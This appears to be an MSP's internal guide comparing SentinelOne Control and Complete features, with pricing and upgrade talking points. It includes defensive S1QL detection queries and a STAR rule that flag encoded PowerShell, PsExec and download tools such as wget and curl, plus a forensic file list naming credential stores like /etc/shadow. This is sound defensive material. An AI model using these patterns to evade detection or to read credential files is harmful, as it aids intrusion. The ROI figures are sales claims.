SentinelOne Control vs Complete Feature Comparison

SCENARIO

This document provides a comprehensive comparison between SentinelOne Singularity Control and Singularity Complete SKUs to help MSP teams understand the capabilities gained when upgrading clients, justify the additional investment to stakeholders, and ensure full utilization of Complete features.

Use this reference when:

• Evaluating SKU options for new client deployments
• Justifying upgrade costs to client stakeholders
• Training team members on Complete-specific capabilities
• Planning feature rollout after upgrading from Control to Complete
• Conducting security posture assessments

Reference Documentation:

• SentinelOne Platform Packages
• Singularity Complete Overview
• Purple AI Platform
• Deep Visibility Datasheet
• STAR Datasheet

REQUIREMENTS & ASSUMPTIONS

Prerequisites

• Active SentinelOne console access
• Understanding of endpoint security fundamentals
• Familiarity with SentinelOne console navigation

Assumed Knowledge

• Basic EDR/XDR concepts
• Threat investigation workflows
• MSP security operations procedures

SKU OVERVIEW

Singularity Platform Tiers

┌─────────────────────────────────────────────────────────────────────┐
│                    SentinelOne Singularity Platform                 │
├─────────────────┬─────────────────┬─────────────────┬───────────────┤
│      Core       │     Control     │    Complete     │  Enterprise   │
│   (Basic EPP)   │  (EPP + Basic   │ (EPP + Full EDR │ (Complete +   │
│                 │   EDR Controls) │    + XDR)       │   Add-ons)    │
├─────────────────┼─────────────────┼─────────────────┼───────────────┤
│ • Static AI     │ • All Core      │ • All Control   │ • All Complete│
│ • Behavioral AI │ • Firewall Ctrl │ • Deep Visibility│ • Ranger     │
│ • NGAV          │ • Device Control│ • STAR Rules    │ • Identity    │
│ • Auto-mitigate │ • Network Ctrl  │ • Remote Shell  │ • Cloud       │
│                 │ • Rogue Device  │ • Purple AI     │ • Vigilance   │
│                 │   Detection     │ • File Fetch    │   MDR         │
│                 │                 │ • 1-Click Rollback│             │
│                 │                 │ • XDR Correlation│             │
└─────────────────┴─────────────────┴─────────────────┴───────────────┘

Pricing Reference (2025)

ROI Consideration: The $20/endpoint/year upgrade from Control to Complete provides significant investigation and response capabilities that can reduce incident response time by 60%+ and justify the investment through labor savings.

DETAILED FEATURE COMPARISON

Protection Features (Both SKUs)

Control Features (Both SKUs)

EDR/XDR Features (Complete Only)

COMPLETE-EXCLUSIVE FEATURES DEEP DIVE

1. Deep Visibility (EDR Telemetry)

What It Is: Deep Visibility is SentinelOne's endpoint detection and response (EDR) data collection engine that captures comprehensive endpoint telemetry for threat hunting and forensic investigation.

Capabilities:

• Process execution tracking (parent/child relationships)
• File operations (create, modify, delete, rename)
• Network connections (source, destination, ports, protocols)
• Registry modifications
• DNS queries
• Login events
• Module loads (DLLs, drivers)
• Cross-process operations

Query Language (S1QL):

-- Example: Find PowerShell executing encoded commands
EventType = "Process Creation" AND
ProcessName = "powershell.exe" AND
ProcessCmd CONTAINS "-enc"
 
-- Example: Detect lateral movement via PsExec
EventType = "Process Creation" AND
ProcessName = "psexec.exe" OR
ProcessName = "psexesvc.exe"
 
-- Example: Find files created in Temp folders
EventType = "File Creation" AND
FilePath CONTAINS "\Temp\" AND
FileExtension IN (".exe", ".dll", ".ps1", ".bat")

Data Retention:

• Default: 14 days
• Upgradeable: 30, 90, or 365 days (additional cost)

Use Cases:

Console Location: Visibility → Deep Visibility

2. Storyline Technology

What It Is: Patented AI technology that automatically correlates related events (processes, files, network connections, registry changes) into a coherent attack narrative.

How It Works:

Traditional EDR: Individual disconnected alerts
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│Alert│ │Alert│ │Alert│ │Alert│ │Alert│
└─────┘ └─────┘ └─────┘ └─────┘ └─────┘
   ↓        ↓       ↓       ↓       ↓
Manual correlation required by analyst

SentinelOne Storyline: Auto-correlated attack story
┌─────────────────────────────────────────────────┐
│                   Storyline                      │
│  ┌─────┐    ┌─────┐    ┌─────┐    ┌─────┐      │
│  │Email│───→│Macro│───→│PS   │───→│C2   │      │
│  │Open │    │Exec │    │Down │    │Conn │      │
│  └─────┘    └─────┘    └─────┘    └─────┘      │
│                                                 │
│  Full context: User, time, files, network, etc. │
└─────────────────────────────────────────────────┘

Benefits:

• Reduces investigation time from hours to minutes
• Eliminates manual event correlation
• Provides complete attack context
• Enables faster, more accurate response decisions

Storyline ID: Every related event shares a Storyline ID, allowing single-query retrieval of entire attack chains:

StorylineId = "ABC123XYZ..."

Console Location: Threats → Click any threat → Storyline tab

3. STAR (Storyline Active Response) Custom Rules

What It Is: Cloud-based automated hunting, detection, and response engine that allows creation of custom detection rules without agent updates.

Capabilities:

• Convert Deep Visibility queries into automated detections
• Create custom rules based on your environment
• Map rules to MITRE ATT&CK framework
• Define automated response actions
• Deploy rules instantly across all endpoints

Rule Components:

STAR Rule Structure:
  Name: "Detect Suspicious PowerShell Download"
  Description: "Detects PowerShell downloading files from internet"
  Severity: High
  MITRE: T1059.001 (Command and Scripting Interpreter: PowerShell)
 
  Query: |
    EventType = "Process Creation" AND
    ProcessName = "powershell.exe" AND
    (ProcessCmd CONTAINS "DownloadFile" OR
     ProcessCmd CONTAINS "Invoke-WebRequest" OR
     ProcessCmd CONTAINS "wget" OR
     ProcessCmd CONTAINS "curl")
 
  Response:
    - Alert: True
    - Kill Process: Optional
    - Network Quarantine: Optional

Default Rules: Complete includes 100+ pre-built STAR rules covering:

• Common attack techniques
• MITRE ATT&CK TTPs
• Industry-specific threats
• Emerging threat indicators

Use Cases:

Console Location: Sentinels → STAR Rules

4. Remote Shell

What It Is: Secure, audited remote command-line access to endpoints for live investigation and response without requiring separate remote access tools.

Capabilities:

• Full PowerShell/Bash/Zsh access
• File system navigation
• Process management
• Registry access (Windows)
• Network diagnostics
• Evidence collection

Security Controls:

Remote Shell Security:
  Authentication: Console user must be authenticated
  Authorization: Requires specific role permission
  Approval: Optional approval workflow
  Audit: Full session logging and recording
  Timeout: Configurable session timeout (default 30 min)
  Encryption: All traffic encrypted via agent-console tunnel

Common Investigation Commands:

# Windows - Check running processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 20
 
# Windows - Check network connections
Get-NetTCPConnection -State Established | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess
 
# Windows - Check scheduled tasks
Get-ScheduledTask | Where-Object {$_.State -eq "Ready"}
 
# Windows - Check startup items
Get-CimInstance Win32_StartupCommand | Select-Object Name, Command, Location
 
# Windows - Check recent file modifications
Get-ChildItem -Path C:\Users -Recurse -File | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-1)} | Select-Object FullName, LastWriteTime

Policy Configuration:

Console Location: Sentinels → Select Agent → Actions → Remote Shell

5. File Fetch (Forensic Collection)

What It Is: Remote file retrieval capability for collecting suspicious files, logs, or evidence from endpoints without physical access.

Capabilities:

• Download any file from endpoint
• Collect memory dumps
• Retrieve logs and artifacts
• Password-protected ZIP delivery
• Full audit trail

Common Forensic Collections:

Windows Artifacts:
  - C:\Windows\System32\winevt\Logs\*.evtx     # Event logs
  - C:\Windows\Prefetch\*.pf                   # Prefetch files
  - C:\$MFT                                    # Master File Table
  - C:\Users\*\NTUSER.DAT                      # User registry hives
  - C:\Windows\System32\config\*               # System registry
  - C:\Users\*\AppData\Local\Microsoft\Windows\WebCache\  # Browser cache
 
Linux Artifacts:
  - /var/log/auth.log                          # Authentication logs
  - /var/log/syslog                            # System logs
  - /etc/passwd                                # User accounts
  - /etc/shadow                                # Password hashes (if permitted)
  - ~/.bash_history                            # Command history

Use Cases:

Console Location: Sentinels → Select Agent → Actions → Fetch Files

6. 1-Click Rollback (Ransomware Recovery)

What It Is: Automated endpoint recovery capability that reverses malicious changes (file encryption, deletions, modifications) using SentinelOne's Volume Shadow Copy integration.

How It Works:

Attack Timeline:
[T0] Normal state → Snapshot captured
[T1] Ransomware executes
[T2] Files encrypted
[T3] SentinelOne detects threat
[T4] Threat killed and quarantined
[T5] 1-Click Rollback initiated
[T6] Files restored to T0 state

Requirements:

• Volume Shadow Copies enabled (Windows)
• Sufficient disk space for snapshots
• Ransomware detected before snapshot deletion
• Policy setting enabled

Rollback Capabilities:

• Restore encrypted files
• Reverse registry changes
• Remove dropped files
• Restore deleted files

Limitations:

• Requires VSS snapshots exist
• Cannot restore if snapshots deleted by ransomware
• Some file types may not be recoverable
• Network shares typically not covered

Console Location: Threats → Select Threat → Actions → Rollback

7. Purple AI (AI Security Analyst)

What It Is: Industry's most advanced AI security analyst that translates natural language into structured queries, summarizes events, guides investigations, and provides recommended actions.

Capabilities:

Natural Language Queries:

Instead of writing:
  EventType = "Process Creation" AND ProcessName = "powershell.exe"
  AND ProcessCmd CONTAINS "-enc"

Simply type:
  "Show me all encoded PowerShell commands in the last 24 hours"

Investigation Assistance:

• Summarizes complex attack storylines
• Recommends next investigation steps
• Generates executive summaries
• Creates investigation notebooks
• Suggests response actions

Auto-Triage:

• Automatically assesses alert severity
• Determines true positive likelihood
• Provides verdict reasoning
• Reduces alert fatigue

Auto-Investigation (Athena Release):

• End-to-end agentic investigations
• Dynamic reasoning and pivoting
• Impact analysis
• Recommended custom rule creation
• Response recommendations

Sample Purple AI Interactions:

Analyst: "What happened on endpoint WORKSTATION-123 yesterday?"

Purple AI: "Based on Deep Visibility data, WORKSTATION-123 had the
following notable activity:
- 09:15 AM: User john.doe logged in
- 10:32 AM: PowerShell executed suspicious encoded command
- 10:33 AM: Network connection to 185.x.x.x (known C2)
- 10:34 AM: SentinelOne blocked and quarantined threat

Recommended next steps:
1. Review the full Storyline (link)
2. Check other endpoints for similar activity
3. Block the C2 IP at firewall level
4. Reset user credentials as precaution

Would you like me to run these queries?"

Console Location: Purple AI icon (top navigation) or Visibility → Purple AI

8. XDR Correlation

What It Is: Extended Detection and Response capabilities that correlate threats across multiple endpoints and integrated data sources.

Correlation Capabilities:

• Cross-endpoint attack detection
• Lateral movement tracking
• Campaign identification
• IOC propagation tracking

Integrated Data Sources (with add-ons):

• Cloud workloads (AWS, Azure, GCP)
• Identity providers (Azure AD, Okta)
• Network security (Zscaler, Palo Alto, Fortinet)
• Email security (Proofpoint, Microsoft)
• SIEM platforms

Example XDR Scenario:

Traditional (Control):
  Endpoint A: Phishing detected ──→ Alert
  Endpoint B: Suspicious process ──→ Alert
  Endpoint C: C2 connection ──→ Alert
  (Three separate, unconnected alerts)

XDR (Complete):
  ┌─────────────────────────────────────────────┐
  │           CAMPAIGN: APT-2025-001            │
  │                                             │
  │  Endpoint A ──→ Endpoint B ──→ Endpoint C   │
  │  (Phishing)    (Lateral)      (Exfil)      │
  │                                             │
  │  Common IOCs: malware.exe, 185.x.x.x       │
  │  MITRE: T1566 → T1021 → T1041              │
  │  Affected Users: 3                          │
  │  Recommended: Isolate all, reset creds     │
  └─────────────────────────────────────────────┘

SIDE-BY-SIDE COMPARISON MATRIX

Investigation Workflow Comparison

Time to Resolution Comparison

UPGRADE JUSTIFICATION

Cost-Benefit Analysis

Scenario: 150 Endpoint Client

Annual Cost Difference:
  Control: 150 × $65 = $9,750
  Complete: 150 × $85 = $12,750
  Difference: $3,000/year

Labor Savings (Conservative):
  - Reduced investigation time: 10 hrs/month × $75/hr = $750/month = $9,000/year
  - Avoided backup restores: 2/year × $2,000 = $4,000/year
  - Proactive threat hunting: Priceless (breach prevention)

ROI: ($9,000 + $4,000) / $3,000 = 433% ROI

Client Conversation Points

For Security-Conscious Clients:

• "Complete gives you the same tools our SOC uses to investigate threats"
• "You get ransomware rollback that can recover files in minutes instead of hours"
• "Purple AI means faster response even for junior analysts"

For Cost-Conscious Clients:

• "The $20/endpoint difference pays for itself in the first investigation"
• "Ransomware recovery alone justifies the upgrade"
• "Reduced investigation time means lower MSP bills or faster response"

For Compliance-Focused Clients:

• "Deep Visibility provides the forensic evidence auditors require"
• "14+ days of telemetry for incident reconstruction"
• "MITRE ATT&CK mapping for compliance reporting"

FEATURE ACTIVATION CHECKLIST

When upgrading a client from Control to Complete:

Immediate Configuration

• Verify Complete SKU applied to site
• Enable Deep Visibility data collection in policy
• Configure data retention period (14/30/90 days)
• Enable STAR default rules
• Configure Remote Shell policy (servers only recommended)
• Enable 1-Click Rollback (verify VSS enabled on endpoints)
• Grant appropriate users Purple AI access

Team Enablement

• Train SOC team on Deep Visibility queries
• Create standard hunting queries library
• Document Remote Shell procedures
• Establish STAR rule creation workflow
• Set up Purple AI for analysts

Ongoing Operations

• Schedule weekly threat hunting
• Create STAR rules for client-specific threats
• Use Purple AI for investigation acceleration
• Generate monthly Deep Visibility reports
• Review and tune STAR rules quarterly

QUICK REFERENCE

Console Navigation (Complete Features)

Common Deep Visibility Queries

-- Encoded PowerShell
EventType = "Process Creation" AND ProcessName = "powershell.exe" AND ProcessCmd CONTAINS "-enc"
 
-- Lateral Movement (PsExec)
EventType = "Process Creation" AND (ProcessName = "psexec.exe" OR ProcessName = "psexesvc.exe")
 
-- Suspicious Downloads
EventType = "File Creation" AND FilePath CONTAINS "\Downloads\" AND FileExtension IN (".exe", ".dll", ".ps1")
 
-- Scheduled Task Creation
EventType = "Scheduled Task" AND EventSubType = "Created"
 
-- Unusual Network Connections
EventType = "Network Connection" AND DstPort NOT IN (80, 443, 53) AND ThreatIndicator = True

API Endpoints (Complete Features)

# Deep Visibility Query
POST /web/api/v2.1/dv/query
 
# STAR Rules
GET /web/api/v2.1/star-rules
POST /web/api/v2.1/star-rules
 
# Remote Shell Session
POST /web/api/v2.1/agents/{agent_id}/actions/remote-shell
 
# Fetch Files
POST /web/api/v2.1/agents/{agent_id}/actions/fetch-files
 
# Rollback
POST /web/api/v2.1/threats/{threat_id}/actions/rollback

RELATED DOCUMENTATION

• HOWTO- SentinelOne MSP Client Onboarding
• HOWTO- SentinelOne Deep Visibility Threat Hunting (planned)
• HOWTO- SentinelOne STAR Custom Detection Rules (planned)
• HOWTO- SentinelOne Remote Shell Operations (planned)
• HOWTO- SentinelOne Threat Investigation Workflow

SOURCES

• SentinelOne Platform Packages
• Singularity Complete
• Purple AI Platform
• Purple AI Athena Release
• Deep Visibility Datasheet
• STAR Datasheet
• SentinelOne Pricing Guide (UnderDefense)
• Control vs Complete (Cyber Vigilance)
• SentinelOne Deep Visibility Queries (GitHub)
• S1QL Queries (SentinelLabs)

REVISION HISTORY

Related Reading

• SentinelOne Policy Configuration Best Practices
• SentinelOne Deep Visibility Threat Hunting
• SentinelOne Forensics Rollback and Remediation